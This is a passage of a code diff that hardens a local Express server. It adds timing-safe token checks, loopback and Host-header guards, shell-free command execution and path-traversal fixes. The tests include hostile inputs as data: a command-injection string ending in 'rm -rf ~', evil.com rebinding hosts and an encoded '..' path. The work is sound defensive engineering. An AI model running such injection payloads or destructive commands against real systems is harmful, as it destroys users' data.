+  it('returns false for same-length differing strings', () => {
+    expect(safeEqual('a'.repeat(64), 'b' + 'a'.repeat(63))).toBe(false)
+  })
+  it('returns false for different-length strings (no throw)', () => {
+    expect(safeEqual('abc', 'abcd')).toBe(false)
+  })
+  it('returns true for two empty strings', () => {
+    expect(safeEqual('', '')).toBe(true)
+  })
+})
+
+describe('isLoopbackAddress (H-02/03/04)', () => {
+  it.each([
+    ['127.0.0.1', true],
+    ['127.0.0.5', true],
+    ['::1', true],
+    ['::ffff:127.0.0.1', true],
+    ['192.168.1.10', false],
+    ['10.0.0.1', false],
+    ['', false],
+    [undefined, false],
+  ] as const)('%s → %s', (addr, expected) => {
+    expect(isLoopbackAddress(addr)).toBe(expected)
+  })
+})
+
+describe('requireLoopback middleware', () => {
+  it('calls next() for a loopback peer', () => {
+    const next = vi.fn()
+    const res = mockResponse()
+    requireLoopback({ socket: { remoteAddress: '127.0.0.1' } } as never, res, next)
+    expect(next).toHaveBeenCalledOnce()
+    expect(res.status).not.toHaveBeenCalled()
+  })
+  it('403s a non-loopback peer', () => {
+    const next = vi.fn()
+    const res = mockResponse()
+    requireLoopback({ socket: { remoteAddress: '203.0.113.7' } } as never, res, next)
+    expect(next).not.toHaveBeenCalled()
+    expect(res.statusCode).toBe(403)
+    expect(res.body.error).toMatch(/loopback/i)
+  })
+  it('403s when the socket has no remoteAddress', () => {
+    const next = vi.fn()
+    const res = mockResponse()
+    requireLoopback({ socket: {} } as never, res, next)
+    expect(res.statusCode).toBe(403)
+  })
+})
+
+describe('isAllowedHost (H-08 anti DNS-rebinding)', () => {
+  it.each([
+    ['localhost:4200', true],
+    ['localhost:4201', true],
+    ['127.0.0.1:4200', true],
+    ['127.0.0.1', true],
+    ['tauri.localhost', true],
+    ['[::1]:4200', true],
+    [undefined, true],
+    ['evil.com:4200', false],
+    ['evil.com', false],
+    ['attacker.localhost.evil.com', false],
+    ['127.0.0.1.evil.com', false],
+  ] as const)('%s → %s', (host, expected) => {
+    expect(isAllowedHost(host)).toBe(expected)
+  })
+})
+
+describe('hostValidationMiddleware', () => {
+  it('calls next() for an allowed host', () => {
+    const next = vi.fn()
+    const res = mockResponse()
+    hostValidationMiddleware({ headers: { host: 'localhost:4200' } } as never, res, next)
+    expect(next).toHaveBeenCalledOnce()
+  })
+  it('calls next() when Host is absent', () => {
+    const next = vi.fn()
+    const res = mockResponse()
+    hostValidationMiddleware({ headers: {} } as never, res, next)
+    expect(next).toHaveBeenCalledOnce()
+  })
+  it('403s a rebinding Host', () => {
+    const next = vi.fn()
+    const res = mockResponse()
+    hostValidationMiddleware({ headers: { host: 'evil.com:4200' } } as never, res, next)
+    expect(next).not.toHaveBeenCalled()
+    expect(res.statusCode).toBe(403)
+    expect(res.body.error).toMatch(/Host/i)
   })
 })
 

--- a/server/auth.ts
+++ b/server/auth.ts
@@ -1,7 +1,7 @@
 import fs from 'fs'
 import path from 'path'
 import os from 'os'
-import { randomUUID } from 'crypto'
+import { randomUUID, timingSafeEqual } from 'crypto'
 import type { IncomingMessage } from 'http'
 import type { Request, Response, NextFunction } from 'express'
 
@@ -13,6 +13,16 @@ let _token: string | null = null
 /**
  * Loads an existing API token from disk, or generates and persists a new one.
  * Returns the same token for the lifetime of the process.
+ *
+ * DESIGN NOTE (H-06): this is a single static, non-expiring, unscoped token
+ * (≈122 bits) that grants EVERYTHING — terminals (= remote shell), arbitrary
+ * `claude --dangerously-skip-permissions` spawns, filesystem reads, project
+ * admin. We deliberately do NOT mitigate this in-process: changing the token
+ * model would break the existing web client and CLI, and the correct fix is
+ * architectural. The future Mobile Gateway issues PER-DEVICE, hashed,
+ * `companion`-scoped tokens bound to a cert fingerprint with sliding 90-day
+ * expiry + revocation, and NEVER exposes this master token to the network. The
+ * master token stays loopback-only (see `requireLoopback`) + bound to 127.0.0.1.
  */
 export function loadOrGenerateToken(): string {
   if (_token) return _token
@@ -47,6 +57,81 @@ export function getServerToken(): string {
 }
 
 /**
+ * Constant-time string comparison (H-05).
+ *
+ * `a !== b` on strings short-circuits at the first differing byte, leaking a
+ * timing oracle that can recover a secret byte-by-byte. `timingSafeEqual`
+ * compares in time independent of where the first mismatch is — but it THROWS
+ * when the two buffers differ in length, so we length-guard first. The length
+ * guard itself is not secret (the token length is fixed and public), so it
+ * leaks nothing useful.
+ */
+export function safeEqual(a: string, b: string): boolean {
+  const ab = Buffer.from(a)
+  const bb = Buffer.from(b)
+  return ab.length === bb.length && timingSafeEqual(ab, bb)
+}
+
+/**
+ * True when an address is an IPv4/IPv6 loopback address.
+ *
+ * Node reports the peer of a TCP connection as `req.socket.remoteAddress`.
+ * For a server bound to 127.0.0.1 this is always loopback today, but the
+ * `requireLoopback` middleware below is an explicit, bind-independent guard so
+ * that the day the Mobile Gateway (or a mistaken bind change) opens a network
+ * surface, the most sensitive endpoints (token bootstrap, OTLP, docs) still
+ * reject non-local peers. IPv4-mapped IPv6 (`::ffff:127.0.0.1`) and the whole
+ * 127.0.0.0/8 block are treated as loopback.
+ */
+export function isLoopbackAddress(addr: string | undefined): boolean {
+  if (!addr) return false
+  if (addr === '::1' || addr === '::ffff:127.0.0.1') return true
+  // Strip an IPv4-mapped IPv6 prefix if present.
+  const v4 = addr.startsWith('::ffff:') ? addr.slice(7) : addr
+  return /^127\.\d{1,3}\.\d{1,3}\.\d{1,3}$/.test(v4)
+}
+
+/**
+ * Express middleware that rejects any request whose peer is not on the loopback
+ * interface (H-02/H-03/H-04). Applied to endpoints that must work without a
+ * token for the local client/CLI/telemetry to bootstrap, but must never be
+ * reachable from the network: `/api/hub/token`, `/otlp`, `/api/docs`.
+ */
+export function requireLoopback(req: Request, res: Response, next: NextFunction): void {
+  if (isLoopbackAddress(req.socket?.remoteAddress)) {
+    next()
+    return
+  }
+  res.status(403).json({ error: 'Forbidden: loopback only' })
+}
+
+// ─── Host-header validation (H-08) — anti DNS-rebinding ───────────────────────
+//
+// CORS alone does not stop DNS rebinding: a same-origin GET carries no Origin
+// header, so a CORS check lets it through. Validating the Host header does stop
+// it — a rebound page keeps sending `Host: evil.com:4200` (the host is the
+// page's origin, not the resolved IP), which fails this allowlist. Legitimate
+// clients (web on localhost/127.0.0.1, the CLI, the Tauri WebView via
+// tauri.localhost, telemetry on 127.0.0.1) all match. A missing Host is allowed
+// (non-browser HTTP/1.0 clients); browsers always send one, so the rebinding
+// vector is still closed.
+export const ALLOWED_HOST_PATTERN = /^(localhost|127\.0\.0\.1|\[::1\]|tauri\.localhost)(:\d+)?$/
+
+/** True when a Host header value is an allowed loopback host (or absent). */
+export function isAllowedHost(host: string | undefined): boolean {
+  return host === undefined || ALLOWED_HOST_PATTERN.test(host)
+}
+
+/** Express middleware: 403 when the Host header is present and not loopback. */
+export function hostValidationMiddleware(req: Request, res: Response, next: NextFunction): void {
+  if (isAllowedHost(req.headers['host'])) {
+    next()
+    return
+  }
+  res.status(403).json({ error: 'Forbidden: invalid Host header' })
+}
+
+/**
  * Resets the in-memory token cache (for tests only).
  * @internal
  */
@@ -72,7 +157,7 @@ export function requireAuth(req: Request, res: Response, next: NextFunction): vo
     provided = hubTokenHeader.trim()
   }
 
-  if (!provided || provided !== token) {
+  if (!provided || !safeEqual(provided, token)) {
     res.status(401).json({ error: 'Unauthorized' })
     return
   }

--- a/server/chat-manager.test.ts
+++ b/server/chat-manager.test.ts
@@ -316,6 +316,27 @@ describe('ChatManager', () => {
     await sendPromise
   })
 
+  it('M13: rejects a concurrent second turn during the explore-slot await (no double spawn)', async () => {
+    const convId = 'conv-m13'
+    createConversation(db, { id: convId, model: 'claude-sonnet-4-5', kind: 'explore' })
+    vi.mocked(mockExecSync).mockReturnValue(Buffer.from('/usr/bin/claude'))
+    const child = createMockChildProcess()
+    vi.mocked(mockSpawn).mockReturnValue(child as any)
+
+    // First turn reserves synchronously, then suspends on the explore-slot await.
+    const p1 = cm.sendMessage(convId, 'first')
+    // Second turn runs synchronously up to the guard, sees the reservation, bails.
+    const p2 = cm.sendMessage(convId, 'second')
+
+    await p2 // resolves quickly (rejected by the reservation guard)
+    await finishProcess(child, 0)
+    await p1
+
+    // Without the synchronous reservation both would have passed the has()-guards
+    // during the await and spawned twice.
+    expect(mockSpawn).toHaveBeenCalledTimes(1)
+  })
+
   // ─── Test 11: abort on non-active conversation does nothing ────────────────
 
   it('abort on non-active conversation does nothing', () => {

--- a/server/chat-manager.ts
+++ b/server/chat-manager.ts
@@ -92,6 +92,11 @@ export class ChatManager {
   private _broadcast: (msg: WsMessage) => void
   private _db: DbInstance
   private _activeProcesses: Map<string, ChildProcess>
+  /** M13: conversations with a turn in-flight but not yet spawned. Closes the
+   *  TOCTOU window between sendMessage's initial guard and `_activeProcesses.set`
+   *  across the explore-slot/attachment awaits, so a second concurrent POST for
+   *  the same conversation is rejected instead of double-spawning. */
+  private _reservedTurns: Set<string> = new Set()
   private _buffers: Map<string, string>
   private _emittedProposals: Map<string, Set<string>>
   private _abortingConversations: Set<string>
@@ -265,7 +270,13 @@ export class ChatManager {
 
   private async _waitForExploreSlot(conversationId: string): Promise<'ok' | 'busy'> {
     if (this._countStreamingExplore() < EXPLORE_MAX_CONCURRENCY) return 'ok'
-    // Try to evict an idle victim first.
+    // M14: a streaming slot is freed only when a STREAMING turn ends. The old code
+    // evicted an idle (non-streaming) victim and immediately returned 'ok' — but
+    // _findIdleExploreVictim skips streaming entries, so the victim holds no live
+    // slot and the count is unchanged. That admitted a 6th concurrent turn (and,
+    // repeated per idle/minimized entry, made the effective cap 5 + idle-count =
+    // unbounded CLI spawning). Now: prune the idle entry (memory hygiene + kill any
+    // stray child) but only grant the slot if the streaming count actually dropped.
     const victim = this._findIdleExploreVictim(conversationId)
     if (victim) {
       const child = this._activeProcesses.get(victim)
@@ -274,9 +285,9 @@ export class ChatManager {
       }
       this._clearIdleTimer(victim)
       this._exploreLifecycle.delete(victim)
-      return 'ok'
+      if (this._countStreamingExplore() < EXPLORE_MAX_CONCURRENCY) return 'ok'
     }
-    // No idle victim — queue with timeout.
+    // Still at cap — queue with timeout until a streaming turn completes.
     return new Promise<'ok' | 'busy'>((resolve) => {
       const timeoutTimer = setTimeout(() => {
         const idx = this._exploreQueue.findIndex((q) => q.conversationId === conversationId)
@@ -444,8 +455,8 @@ export class ChatManager {
   }
 
   async sendMessage(conversationId: string, userText: string, options?: SendMessageOptions): Promise<void> {
-    if (this._activeProcesses.has(conversationId)) {
-      console.warn(`[ChatManager] conversation ${conversationId} already has an active stream`)
+    if (this._activeProcesses.has(conversationId) || this._reservedTurns.has(conversationId)) {
+      console.warn(`[ChatManager] conversation ${conversationId} already has an active or pending stream`)
       return
     }
 
@@ -470,6 +481,11 @@ export class ChatManager {
       return
     }
 
+    // M13: reserve synchronously before the explore-slot / attachment awaits.
+    // Released in the finally at the end of the method — by then either
+    // _activeProcesses owns the guard (spawn succeeded) or the turn bailed out.
+    this._reservedTurns.add(conversationId)
+    try {
     // Explore: enforce per-project concurrency cap before doing any work.
     if (conversation.kind === 'explore') {
       const slot = await this._waitForExploreSlot(conversationId)
@@ -908,6 +924,12 @@ export class ChatManager {
       }
       child.on('close', onClose)
     })
+    } finally {
+      // M13: release the synchronous reservation. After _activeProcesses.set the
+      // active-process map is the guard; on any early return / throw before that,
+      // this frees the conversation for a retry.
+      this._reservedTurns.delete(conversationId)
+    }
   }
 
   abort(conversationId: string): void {

--- a/server/config.test.ts
+++ b/server/config.test.ts
@@ -1,19 +1,23 @@
 import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
 import fs from 'fs'
-import { execSync } from 'child_process'
+import { execSync, execFileSync } from 'child_process'
 
-// Mock child_process execSync to avoid real CLI calls
+// Mock child_process execSync/execFileSync to avoid real CLI calls.
+// Detection commands (which/auth status/git remote) go through execSync; the
+// issue-fetch path goes through execFileSync (argv form, no shell — H-12).
 vi.mock('child_process', async () => {
   const actual = await vi.importActual<typeof import('child_process')>('child_process')
   return {
     ...actual,
     execSync: vi.fn(),
+    execFileSync: vi.fn(),
   }
 })
 
 import { getConfig, fetchIssues } from './config'
 
 const mockExecSync = execSync as ReturnType<typeof vi.fn>
+const mockExecFileSync = execFileSync as ReturnType<typeof vi.fn>
 
 // Spy references — typed as any to avoid overloaded-signature inference conflicts
 // eslint-disable-next-line @typescript-eslint/no-explicit-any
@@ -263,6 +267,7 @@ describe('fetchIssues', () => {
   beforeEach(() => {
     vi.resetAllMocks()
     mockExecSync.mockReturnValue(Buffer.from(''))
+    mockExecFileSync.mockReturnValue(Buffer.from(''))
   })
 
   it('returns structured issues from gh issue list output', () => {
@@ -270,7 +275,7 @@ describe('fetchIssues', () => {
       { number: 42, title: 'Fix the bug', labels: [{ name: 'bug' }], body: 'Description', url: 'https://github.com/...' },
       { number: 43, title: 'Add feature', labels: [], body: '', url: 'https://github.com/...' },
     ])
-    mockExecSync.mockReturnValue(Buffer.from(mockOutput))
+    mockExecFileSync.mockReturnValue(Buffer.from(mockOutput))
 
     const issues = fetchIssues('github', {})
 
@@ -281,27 +286,44 @@ describe('fetchIssues', () => {
   })
 
   it('returns empty array when gh command fails', () => {
-    mockExecSync.mockImplementation(() => { throw new Error('gh not found') })
+    mockExecFileSync.mockImplementation(() => { throw new Error('gh not found') })
 
     const issues = fetchIssues('github', {})
 
     expect(issues).toEqual([])
   })
 
-  it('passes repo and label args to gh command', () => {
-    mockExecSync.mockReturnValue(Buffer.from('[]'))
+  it('passes repo and label args to gh as a literal argv array (no shell)', () => {
+    mockExecFileSync.mockReturnValue(Buffer.from('[]'))
 
     fetchIssues('github', { repo: 'owner/repo', label: 'bug', search: 'auth' })
 
-    const callArgs = mockExecSync.mock.calls[0][0]
-    expect(callArgs).toContain('--repo owner/repo')
-    expect(callArgs).toContain('--label bug')
-    expect(callArgs).toContain('--search auth')
+    // execFileSync(file, args, opts) — file is the program, args is the argv.
+    const [file, argv] = mockExecFileSync.mock.calls[0]
+    expect(file).toBe('gh')
+    expect(argv).toEqual(expect.arrayContaining(['--repo', 'owner/repo', '--label', 'bug', '--search', 'auth']))
+    // The whole thing is never collapsed into a single shell string.
+    expect(typeof argv).not.toBe('string')
+  })
+
+  it('H-12: shell metacharacters in search are passed as one literal arg, not executed', () => {
+    mockExecFileSync.mockReturnValue(Buffer.from('[]'))
+
+    const malicious = '$(touch /tmp/pwned); rm -rf ~'
+    fetchIssues('github', { search: malicious })
+
+    const [file, argv] = mockExecFileSync.mock.calls[0]
+    expect(file).toBe('gh')
+    // The payload survives intact as a single argument — gh treats it as a
+    // literal search term, the shell never sees it.
+    const searchIdx = (argv as string[]).indexOf('--search')
+    expect(searchIdx).toBeGreaterThanOrEqual(0)
+    expect((argv as string[])[searchIdx + 1]).toBe(malicious)
   })
 
   it('returns issues from jira tracker', () => {
     const jiraOutput = `KEY\tSUMMARY\tLABELS\tSTATUS\nPROJ-1\tFix auth bug\tbug,urgent\tOpen\nPROJ-2\tAdd dashboard\t\tIn Progress`
-    mockExecSync.mockReturnValue(Buffer.from(jiraOutput))
+    mockExecFileSync.mockReturnValue(Buffer.from(jiraOutput))
 
     const issues = fetchIssues('jira', {})
 
@@ -313,21 +335,23 @@ describe('fetchIssues', () => {
   })
 
   it('returns empty array when jira command fails', () => {
-    mockExecSync.mockImplementation(() => { throw new Error('jira not found') })
+    mockExecFileSync.mockImplementation(() => { throw new Error('jira not found') })
 
     const issues = fetchIssues('jira', {})
 
     expect(issues).toEqual([])
   })
 
-  it('passes search query to jira command', () => {
-    mockExecSync.mockReturnValue(Buffer.from('KEY\tSUMMARY\tLABELS\tSTATUS'))
+  it('passes search query to jira as a literal --jql argv element', () => {
+    mockExecFileSync.mockReturnValue(Buffer.from('KEY\tSUMMARY\tLABELS\tSTATUS'))
 
     fetchIssues('jira', { search: 'auth' })
 
-    const callArgs = mockExecSync.mock.calls[0][0]
-    expect(callArgs).toContain('--jql')
-    expect(callArgs).toContain('auth')
+    const [file, argv] = mockExecFileSync.mock.calls[0]
+    expect(file).toBe('jira')
+    const jqlIdx = (argv as string[]).indexOf('--jql')
+    expect(jqlIdx).toBeGreaterThanOrEqual(0)
+    expect((argv as string[])[jqlIdx + 1]).toBe('summary ~ "auth"')
   })
 
   it('returns empty array for unsupported tracker', () => {

--- a/server/config.ts
+++ b/server/config.ts
@@ -1,6 +1,6 @@
 import fs from 'fs'
 import path from 'path'
-import { execSync } from 'child_process'
+import { execSync, execFileSync } from 'child_process'
 import type { PhaseDefinition } from './types'
 
 export interface CommandInfo {
@@ -34,6 +34,25 @@ export interface ProjectConfig {
 function runCommand(cmd: string, cwd?: string): string | null {
   try {
     return execSync(cmd, { stdio: ['ignore', 'pipe', 'ignore'], timeout: 5000, cwd }).toString().trim()
+  } catch {
+    return null
+  }
+}
+
+/**
+ * Run a command with an explicit argv array via `execFileSync` — NO shell (H-12).
+ *
+ * `runCommand` routes through `/bin/sh -c`, so any shell metacharacter in an
+ * interpolated value is a command-injection sink. `fetchIssues` builds its
+ * arguments from HTTP query params (`search`/`label`) and the git remote, so it
+ * MUST use this argv form: each argument is passed literally to the program and
+ * the shell never sees it. `runCommand` is retained only for fixed, constant
+ * detection commands (`which gh`, `gh auth status`, `git remote get-url origin`)
+ * that carry no user input.
+ */
+function runCommandArgs(file: string, args: string[], cwd?: string): string | null {
+  try {
+    return execFileSync(file, args, { stdio: ['ignore', 'pipe', 'ignore'], timeout: 5000, cwd }).toString().trim()
   } catch {
     return null
   }
@@ -264,12 +283,12 @@ export function fetchIssues(
   opts: { search?: string; label?: string; repo?: string | null; cwd?: string }
 ): IssueItem[] {
   if (tracker === 'github') {
-    const args = ['gh', 'issue', 'list', '--json', 'number,title,labels,body,url', '--limit', '50']
+    const args = ['issue', 'list', '--json', 'number,title,labels,body,url', '--limit', '50']
     if (opts.repo) args.push('--repo', opts.repo)
     if (opts.label) args.push('--label', opts.label)
     if (opts.search) args.push('--search', opts.search)
 
-    const output = runCommand(args.join(' '), opts.cwd)
+    const output = runCommandArgs('gh', args, opts.cwd)
     if (!output) return []
 
     try {
@@ -294,10 +313,10 @@ export function fetchIssues(
 
   if (tracker === 'jira') {
     const jql = opts.search ? `summary ~ "${opts.search}"` : ''
-    const args = ['jira', 'issue', 'list', '--plain', '--columns', 'KEY,SUMMARY,LABELS,STATUS']
+    const args = ['issue', 'list', '--plain', '--columns', 'KEY,SUMMARY,LABELS,STATUS']
     if (jql) args.push('--jql', jql)
 
-    const output = runCommand(args.join(' '))
+    const output = runCommandArgs('jira', args)
     if (!output) return []
 
     // Parse plain text output: KEY  SUMMARY  LABELS  STATUS

--- a/server/db.test.ts
+++ b/server/db.test.ts
@@ -1,4 +1,7 @@
 import { describe, it, expect, beforeEach } from 'vitest'
+import fs from 'fs'
+import os from 'os'
+import path from 'path'
 import {
   initDb,
   createJob,
@@ -9,6 +12,9 @@ import {
   getJob,
   getJobEvents,
   deleteJob,
+  purgeJobs,
+  upsertTelemetryBlob,
+  getTelemetryBlob,
   getStats,
   createProposal,
   getProposal,
@@ -609,5 +615,93 @@ describe('project settings — ultracode pre-prompt', () => {
   it('getUltracodePrePrompt returns the trimmed override when set', () => {
     updateProjectSettings(db, { ultraPrePrompt: '  Custom instruction.  ' })
     expect(getUltracodePrePrompt(db)).toBe('Custom instruction.')
+  })
+
+  // ─── Fase 0 / audit: data integrity (M6/M7/M8) ───────────────────────────────
+
+  describe('deleteJob with pipeline FK (M7)', () => {
+    const now = new Date().toISOString()
+
+    it('deletes a parent job referenced by a child without throwing', () => {
+      createJob(db, { id: 'parent', command: 'c', started_at: now })
+      createJob(db, { id: 'child', command: 'c', started_at: now, depends_on_job_id: 'parent' })
+
+      expect(() => deleteJob(db, 'parent')).not.toThrow()
+      expect(getJob(db, 'parent')).toBeUndefined()
+      // Child survives with its now-dangling reference cleared.
+      const child = getJob(db, 'child')
+      expect(child).toBeDefined()
+      expect(child!.depends_on_job_id).toBeNull()
+    })
+  })
+
+  describe('purgeJobs FK + atomicity (M6)', () => {
+    const now = new Date().toISOString()
+
+    it('purges a terminal parent still referenced by a non-terminal child', () => {
+      createJob(db, { id: 'p', command: 'c', started_at: now })
+      db.prepare("UPDATE jobs SET status = 'completed' WHERE id = ?").run('p')
+      createJob(db, { id: 'c', command: 'c', started_at: now, depends_on_job_id: 'p' }) // running
+      appendEvent(db, 'p', 1, { event_type: 'log', source: 'stdout', payload: 'hi' })
+
+      const purged = purgeJobs(db)
+      expect(purged).toBe(1)
+      expect(getJob(db, 'p')).toBeUndefined()
+      // Non-terminal child survives, reference cleared, parent's events gone.
+      const child = getJob(db, 'c')
+      expect(child).toBeDefined()
+      expect(child!.depends_on_job_id).toBeNull()
+      expect(getJobEvents(db, 'p')).toEqual([])
+    })
+
+    it('purges a chain of two terminal jobs (parent + child)', () => {
+      createJob(db, { id: 'a', command: 'c', started_at: now })
+      createJob(db, { id: 'b', command: 'c', started_at: now, depends_on_job_id: 'a' })
+      db.prepare("UPDATE jobs SET status = 'completed'").run()
+
+      const purged = purgeJobs(db)
+      expect(purged).toBe(2)
+      expect(getJob(db, 'a')).toBeUndefined()
+      expect(getJob(db, 'b')).toBeUndefined()
+    })
+
+    it('B41: deleteJob removes the job\'s orphan-prone telemetry rows', () => {
+      createJob(db, { id: 'jt', command: 'c', started_at: now })
+      upsertTelemetryBlob(db, { jobId: 'jt', path: '/x.ndjson.gz', byteSize: 0, startedAt: 1, endedAt: 1, state: 'active' })
+      expect(getTelemetryBlob(db, 'jt')).toBeDefined()
+
+      deleteJob(db, 'jt')
+      expect(getJob(db, 'jt')).toBeUndefined()
+      expect(getTelemetryBlob(db, 'jt')).toBeUndefined() // no longer orphaned
+    })
+
+    it('B41: purgeJobs removes telemetry rows for purged jobs', () => {
+      createJob(db, { id: 'jp', command: 'c', started_at: now })
+      db.prepare("UPDATE jobs SET status = 'completed' WHERE id = ?").run('jp')
+      upsertTelemetryBlob(db, { jobId: 'jp', path: '/y.ndjson.gz', byteSize: 0, startedAt: 1, endedAt: 1, state: 'active' })
+
+      purgeJobs(db)
+      expect(getTelemetryBlob(db, 'jp')).toBeUndefined()
+    })
+  })
+
+  describe('migration runner idempotency (M8)', () => {
+    it('re-initializing the same on-disk db does not throw', () => {
+      const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'db-m8-'))
+      const dbPath = path.join(dir, 'jobs.sqlite')
+      try {
+        const d1 = initDb(dbPath)
+        d1.close()
+        // Second init re-runs the migration check against an already-migrated db.
+        let d2: DbInstance | undefined
+        expect(() => { d2 = initDb(dbPath) }).not.toThrow()
+        // And it is fully usable.
+        createJob(d2!, { id: 'x', command: 'c', started_at: new Date().toISOString() })
+        expect(getJob(d2!, 'x')).toBeDefined()
+        d2!.close()
+      } finally {
+        fs.rmSync(dir, { recursive: true, force: true })
+      }
+    })
   })
 })

--- a/server/db.ts
+++ b/server/db.ts
@@ -2,6 +2,7 @@ import fs from 'fs'
 import path from 'path'
 import Database from 'better-sqlite3'
 import type { JobRow, EventRow, StatsRow, JobStatus, JobPriority, ChatConversationRow, ChatMessageRow, ActivityItem } from './types'
+import { secureDir, secureDbFile } from './util/secure-fs'
 
 // ─── Proposal types ───────────────────────────────────────────────────────────
 
@@ -597,8 +598,19 @@ function applyMigrations(db: DbInstance): void {
   for (let i = 0; i < MIGRATIONS.length; i++) {
     const version = i + 1
     if (!appliedVersions.has(version)) {
-      MIGRATIONS[i](db)
-      db.prepare('INSERT OR IGNORE INTO schema_migrations (version) VALUES (?)').run(version)
+      // M8: run each migration body and its version INSERT atomically. SQLite DDL
+      // is transactional, so a crash/failure mid-migration now rolls back the
+      // whole body instead of leaving a half-applied schema with the version
+      // unrecorded — which under the old code re-ran a bare `ALTER TABLE ADD
+      // COLUMN` on next startup and bricked it forever with 'duplicate column
+      // name'. With this, a failed migration leaves nothing applied and re-runs
+      // cleanly. (Pre-existing half-applied DBs are contained by the per-project
+      // load isolation in project-registry.ts — one bad DB no longer kills the hub.)
+      const tx = db.transaction(() => {
+        MIGRATIONS[i](db)
+        db.prepare('INSERT OR IGNORE INTO schema_migrations (version) VALUES (?)').run(version)
+      })
+      tx()
     }
   }
 }
@@ -609,6 +621,7 @@ export function initDb(dbPath: string): DbInstance {
   if (dbPath !== ':memory:') {
     const dir = path.dirname(dbPath)
     fs.mkdirSync(dir, { recursive: true })
+    secureDir(dir) // H-13: owner-only data dir
   }
 
   const db = new Database(dbPath)
@@ -616,6 +629,11 @@ export function initDb(dbPath: string): DbInstance {
   db.pragma('foreign_keys = ON')
 
   applyMigrations(db)
+
+  // H-13: restrict the db + its WAL sidecars to 0600 (jobs.sqlite holds chat
+  // transcripts and verbatim terminal command history). After migrations the
+  // WAL/SHM files exist, so this covers them too.
+  secureDbFile(dbPath)
 
   // Orphan sweep: mark any running jobs as failed on startup
   db.prepare(
@@ -764,7 +782,24 @@ export function getJobEvents(
 }
 
 export function deleteJob(db: DbInstance, jobId: string): void {
-  db.prepare('DELETE FROM jobs WHERE id = ?').run(jobId)
+  // M7: jobs.depends_on_job_id REFERENCES jobs(id) with no ON DELETE action and
+  // foreign_keys=ON, so deleting a pipeline parent throws 'FOREIGN KEY
+  // constraint failed' and the job becomes undeletable from the UI. Clear inbound
+  // references first, in the same transaction as the delete, so it always
+  // succeeds (children keep running; they just lose the now-irrelevant pointer).
+  const tx = db.transaction((id: string) => {
+    db.prepare('UPDATE jobs SET depends_on_job_id = NULL WHERE depends_on_job_id = ?').run(id)
+    // B41: events/job_phases cascade on the jobs FK, but telemetry_blobs/
+    // telemetry_summaries (keyed `jobId`), job_profiles and file_provenance
+    // (keyed `job_id`) have no FK — without these they accumulate forever. (The
+    // on-disk .ndjson.gz blob is reclaimed by the 7-day startup compactor.)
+    db.prepare('DELETE FROM telemetry_blobs WHERE jobId = ?').run(id)
+    db.prepare('DELETE FROM telemetry_summaries WHERE jobId = ?').run(id)
+    db.prepare('DELETE FROM job_profiles WHERE job_id = ?').run(id)
+    db.prepare('DELETE FROM file_provenance WHERE job_id = ?').run(id)
+    db.prepare('DELETE FROM jobs WHERE id = ?').run(id)
+  })
+  tx(jobId)
 }
 
 export function purgeJobs(
@@ -785,13 +820,26 @@ export function purgeJobs(
 
   const where = conditions.join(' AND ')
 
-  // Delete associated events first
-  db.prepare(`DELETE FROM events WHERE job_id IN (SELECT id FROM jobs WHERE ${where})`).run(...params)
-  // Delete associated phases
-  db.prepare(`DELETE FROM job_phases WHERE job_id IN (SELECT id FROM jobs WHERE ${where})`).run(...params)
-  // Delete the jobs
-  const result = db.prepare(`DELETE FROM jobs WHERE ${where}`).run(...params)
-  return result.changes
+  // M6: run the whole purge atomically. Previously these statements ran without a
+  // transaction, so when the final `DELETE FROM jobs` aborted on the
+  // depends_on_job_id FK (a purged job still referenced by a non-purged one), the
+  // events/phases deletes had already committed — destroying log history while
+  // deleting zero job rows, and a misleading 500. The transaction rolls back on
+  // any failure, and NULL-ing inbound references first makes the delete succeed.
+  const tx = db.transaction(() => {
+    const sel = `SELECT id FROM jobs WHERE ${where}`
+    db.prepare(`DELETE FROM events WHERE job_id IN (${sel})`).run(...params)
+    db.prepare(`DELETE FROM job_phases WHERE job_id IN (${sel})`).run(...params)
+    // B41: also purge the no-FK orphan tables for the same jobs.
+    db.prepare(`DELETE FROM telemetry_blobs WHERE jobId IN (${sel})`).run(...params)
+    db.prepare(`DELETE FROM telemetry_summaries WHERE jobId IN (${sel})`).run(...params)
+    db.prepare(`DELETE FROM job_profiles WHERE job_id IN (${sel})`).run(...params)
+    db.prepare(`DELETE FROM file_provenance WHERE job_id IN (${sel})`).run(...params)
+    // Clear inbound FK references from NON-purged jobs to purged jobs.
+    db.prepare(`UPDATE jobs SET depends_on_job_id = NULL WHERE depends_on_job_id IN (${sel})`).run(...params)
+    return db.prepare(`DELETE FROM jobs WHERE ${where}`).run(...params).changes
+  })
+  return tx() as number
 }
 
 // ─── Activity feed ────────────────────────────────────────────────────────────

--- a/server/docs-router.test.ts
+++ b/server/docs-router.test.ts
@@ -219,6 +219,19 @@ describe('docs-router', () => {
       expect([400, 404]).toContain(res.status)
     })
 
+    it('B4: rejects a ".." category and does not read one level above docsDir', async () => {
+      // Plant a markdown file one level above docsDir; '..' as the category would
+      // resolve there if the dot-segment guard were missing.
+      const aboveDir = path.dirname(docsDir)
+      fs.writeFileSync(path.join(aboveDir, 'secret.md'), '# Secret')
+      // URL-encode the dots so '..' reaches the route param instead of being
+      // collapsed by URL normalization before routing.
+      const res = await request(buildApp()).get('/docs/%2e%2e/secret')
+      expect([400, 404]).toContain(res.status)
+      // Ensure the secret content was never served.
+      expect(JSON.stringify(res.body)).not.toContain('Secret')
+    })
+
     it('returns 500 when readFileSync throws on an existing file', async () => {
       fs.writeFileSync(path.join(docsDir, 'read-error.md'), '# Content')
 

--- a/server/docs-router.ts
+++ b/server/docs-router.ts
@@ -161,9 +161,17 @@ function buildCategories(docsDir: string): DocCategory[] {
 }
 
 function isValidCategorySlug(cat: string): boolean {
-  // basename(cat) === cat guards against traversal; the existence check is
-  // done by the route handler.
-  return cat.length > 0 && cat === path.basename(cat) && !cat.includes('/') && !cat.includes('\\')
+  // basename(cat) === cat guards against slashes, but `path.basename('..') === '..'`,
+  // so '.'/'..' slip through and `path.join(docsDir, '..', ...)` escapes one level
+  // up (B4). Reject the dot segments explicitly.
+  return (
+    cat.length > 0 &&
+    cat !== '.' &&
+    cat !== '..' &&
+    cat === path.basename(cat) &&
+    !cat.includes('/') &&
+    !cat.includes('\\')
+  )
 }
 
 // ─── Router ───────────────────────────────────────────────────────────────────
@@ -198,6 +206,14 @@ export function createDocsRouter(): Router {
       category === TOP_LEVEL_CATEGORY_SLUG
         ? path.join(docsDir, `${safeSlug}.md`)
